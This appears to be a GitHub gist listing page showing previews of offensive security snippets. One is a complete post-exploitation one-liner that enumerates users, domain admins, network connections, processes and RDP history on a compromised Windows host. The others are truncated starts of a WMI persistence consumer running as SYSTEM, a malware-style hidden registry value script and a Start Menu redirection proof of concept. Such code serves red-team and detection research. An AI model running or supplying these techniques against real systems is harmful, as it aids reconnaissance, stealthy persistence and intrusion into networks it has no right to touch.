Skip to content

Instantly share code, notes, and snippets.

View KyleHanslovan's full-sized avatar

Kyle Hanslovan KyleHanslovan

View GitHub Profile
@KyleHanslovan
KyleHanslovan / DomainEnumeration.bat
Created June 25, 2016 12:36
Post-exploitation host/domain survey using native Windows commands.
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
@KyleHanslovan
KyleHanslovan / WMIPersistence.mof
Created June 8, 2016 08:22
VBS based ActiveScriptEventConsumer useful for launching applications at startup as SYSTEM.
/*
Author: Kyle Hanslovan
Contact: @KyleHanslovan
License: MIT
Date: 07/18/2014
*/
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of ActiveScriptEventConsumer as $Consumer
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
@KyleHanslovan
KyleHanslovan / CreateNullRegValue.py
Created June 3, 2016 15:33
Script which uses Native APIs to create a "hidden" registry value similar to Powerliks and Kovter malware.
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
@KyleHanslovan
KyleHanslovan / StartMenuRedirection.py
Last active August 18, 2016 23:00
PoC for Start Menu Redirection
import os
import sys
import pythoncom
from win32com.shell import shell, shellcon
def create_shortcut(dest_path, target_path):
"""
"""